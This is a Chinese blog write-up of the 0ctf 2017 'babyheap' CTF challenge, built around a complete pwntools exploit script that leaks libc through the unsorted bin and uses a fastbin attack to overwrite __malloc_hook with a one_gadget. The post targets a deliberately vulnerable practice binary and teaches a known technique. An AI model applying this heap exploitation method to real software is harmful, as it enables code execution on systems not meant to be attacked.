【堆溢出】babyheap_0ctf_2017

最新推荐文章于 2024-01-10 03:24:25 发布
最新推荐文章于 2024-01-10 03:24:25 发布
阅读量298 收藏 2
点赞数 2
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/114807930
版权
CTF 同时被 2 个专栏收录
43 篇文章 0 订阅
订阅专栏
HEAP
17 篇文章 0 订阅
订阅专栏

堆溢出

  • 先给出exp,exp中我标明了每一个步骤
  • 每个步骤执行完后,内存中的地址空间我也贴出来了

exp

from pwn import *

p = process('./babyheap_0ctf_2017')

#p = remote('node3.buuoj.cn',26798)
elf = ELF('./babyheap_0ctf_2017')
context.log_level = 'debug'

def alloc(size):
	p.sendlineafter('Command: ',str(1))
	p.sendlineafter('Size: ',str(size))

def fill(index, size, content):
	p.sendlineafter('Command: ',str(2))
	p.sendlineafter('Index: ',str(index))
	p.sendlineafter('Size: ',str(size))
	p.sendafter('Content: ',content.ljust(size,b'\x00'))

def free(index):
	p.sendlineafter('Command: ',str(3))
	p.sendlineafter('Index: ',str(index))

def dump(index):
	p.sendlineafter('Command: ',str(4))
	p.sendlineafter('Index: ',str(index))
	p.recvuntil('Content: \n')

#step1 创建3个chunk
alloc(0x20) #0
alloc(0x40) #1
alloc(0x100) #2

#step2 修改chunk1 head
fill(0,0x30,b'a'*0x20 + b'\x00'*8+b'\x71')

#step3 在fake chunk尾部构造合法的chunk head
fill(2,0x20,b'a'*0x10 + b'\x00'*8+b'\x21')

#step4 释放fake chunk
free(1) #important

#step5 申请同等大小的chunk
alloc(0x60) #important id1

#step6 还原chunk2 头部
fill(1,0x50,b'b'*0x40 + b'\x00'*8 + b'\x11\x01')

#step7 申请chunk3 防止释放chunk2后合并到top chunk
alloc(0x20)# id 3

#step8 释放chunk2
free(2)

#step9 泄露libc地址
dump(1)
libc_88 = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
log.success('libc_88==>'+str(hex(libc_88)))
libc_base = libc_88-0x58-0x3c4b20
log.success('libc_base==>'+str(hex(libc_base)))
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
malloc_hook = libc_base + libc.sym['__malloc_hook']
fake_chunk = malloc_hook-0x23
log.success('fake_chunk==>'+str(hex(fake_chunk)))

#step10 释放chunk1
free(1)

#step11 修改fast bin 的fd指针指向malloc_hook附近的fake chunk
fill(0,0x40,b'a'*0x20 + p64(0) + p64(0x71) + p64(fake_chunk) + p64(0))

#step12 分配fast bin1
alloc(0x60) #1

#step13 分配 fake chunk
alloc(0x60) #2

#step14 修改fake chunk中的内容 覆盖__malloc_hook指针为one_gadget
fill(2,0x1b,b'a'*3+p64(0)*2 + p64(libc_base+0x4527a))

#step15 再次申请chunk时会调用malloc_hook函数
alloc(0x100)

p.interactive()

创建3个chunk

在这里插入图片描述

修改chunk1 head

在这里插入图片描述

将fake chunk 尾部造假的chunk head

在这里插入图片描述

释放chunk1 即fake chunk

在这里插入图片描述

再申请和fake chunk一样大小的chunk

在这里插入图片描述

还原chunk2 的头部

在这里插入图片描述

申请chunk3, 防止释放chunk2 后,合并到top chunk

在这里插入图片描述

free chunk2

在这里插入图片描述

泄露main_area的地址

在这里插入图片描述

​ 这里泄露的是main_arena+88 的地址

在这里插入图片描述
这里得到mian_arena的实际地址

在这里插入图片描述

​ 通过与libc中main_arena地址计算得到libc的偏移libc_base

在这里插入图片描述

​ 这里就可以用__malloc_hook 的地址来表示fake chunk的地址

free chunk1

在这里插入图片描述

修改 fast bin的 fd指针指向fake chunk

在这里插入图片描述

分配fast bin1

在这里插入图片描述

分配fast bin2(我们的fake chunk)

在这里插入图片描述

修改fake chunk 中内容,覆盖__malloc_hook 为one_gadget

在这里插入图片描述

huzai9527
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3745
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
babyheap_0ctf_2017 详细解析【BUUCTF】
qq_41696518的博客
09-06 2748
好家伙,保护全开,根据文件名,可以判断这是一道题目,刷了这么久,终于遇到题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
babyheap_0ctf_2017 详解
Bi0x的博客
11-24 1609
题目地址: https://buuoj.cn/challenges#babyheap_0ctf_2017 本题为 64 位,以下内容以64位为例 信息收集 弄到题目文件先 checksec 保护全开,那必然就要想办法泄漏出 libc 基地址的偏移量来实现调用其他函数 先逆向一下文件,对于 main 函数大概的构造情况如下 对于 allocate 函数,里面用户输入 size 后根据其大小进行内存分配 这里使用了 calloc函数,其与malloc不同的是分配内存后会把数据.
[BUUCTF] babyheap_0ctf_2017
红叶的博客
03-28 752
有点回想起当初第一次拿到flag时的感觉,继续加油。 本题考察知识点:**Fastbin Attack** 与 **Unsorted Bin Attack。** 通过使用Fastbin Attack与溢出漏洞,我们可以绕过Free后指针置零,从而达到在置零指针后获取块fd指针。 通过Unsorted Bin Attack,我们可以泄露Libc地址。 然后我们再使用Fastbin Attack替换__malloc_hook 本文写给自己,也写给跟我一样全网寻找详细解答的师傅们。
我又pwn啦——*刷题篇 babyheap_0ctf_2017
m0_64195960的博客
07-28 622
babyheap
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
welcome_CTF.exe
08-07
一道简单的ctf逆向题目,取自于成信大2019四叶草安全杯比赛
hac.zip_CTF信息隐写_ctf
09-23
CTF信息隐写,非常简单的入门小实验,带你走进CTF
CTFd-master_roseosy_ctf_
09-30
CTF的练习,好东西。本地环境部署。周长拓展
【BUUCTF - PWN】babyheap_0ctf_2017
古月浪子的博客
04-05 2625
checksec一下,题果然是保护全开 IDA打开看看,首先mmap一块随机区域,用于存放我们申请的块的属性,然后输出菜单,有allocate、fill、free、dump功能 可以注意到,在创建的时候,将的地址和大小存放在了mmap的区域中,并且使用的是calloc,会将申请的内存区域清零 漏洞点在fill函数中,没有限制输入内容的长度,从而可以溢出 删除后会将指针置零 输出...
babyheap_0ctf_2017
m0sway的博客
11-25 513
babyheap_0ctf_2017 使用checksec查看: 保护全开,看到PIE的时候就想到需要泄露libc_base_addr了 拉进IDA中看吧: 一个死循环,主要功能Allocate、Fill、Free、Dump,这边我已经修改函数名了,接下来一个一个看 首先是创建: 最多创建15个chunk、每个chunk的最大size是4096 *(0x18LL * i + a1) = 1;创建chunk时给了标志1 接着是编辑内容: 判断了标志存不存在,若chunk存在,让用户输入size存放
0ctf Babyheap 2017
Bill
03-11 6362
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
babyheap_0_ctf_2017
m0_48127441的博客
04-01 194
漏洞就是劫持程序控制流 先对程序进行分析 alloc(Length) //struct a_malloc{int use_or_not; int Length;void*base;int un_use} ; struct a_malloc malloc_array[16]; fill(任意长度) free(指定块) dump(输出对应chunk的Length)//可以填充任意长度的数据,即可以修改 chunk头 目标 -->劫持程序控制流 --> 把__malloc_hoo...
0CTF-babyheap2017祥讲
Jc
07-26 439
解题思路 1. 查看文件信息,安全机制 2. IDA审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 安全机制全部开启了,其实不用慌,对我们做题影响不是很大 运行 ## IDA ...
[BUUCTF]-PWN:babyheap_0ctf_2017解析
最新发布
2301_79326813的博客
01-10 962
但是这里要解释一点,为什么不能直接释放块4,虽然这样块4也能进入unsortedbin里,但是要注意free块后指向块的指针将会被置零,大致意思就是free了之后,index4就不指向那个块了,这时候dump(4)就是无效的,虽然那个块里面有mainarena+88的地址,但dump(4)不会打印出里面的地址,所以我们要让两个块的指针指向同一个块,这样在释放掉一个块时还能用另一个指针利用该块。后面alloc(0x60)与这里的0x7f有关。
x_ctf_b0verfl0w
10-22
x_ctf_b0verfl0w是一道栈溢出的题目,需要利用栈溢出漏洞来实现攻击。攻击者需要构造一个ROP链,通过泄露puts函数的地址,计算出libc的基地址,然后再通过libc中的system函数和/bin/sh字符串的地址来执行系统命令。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值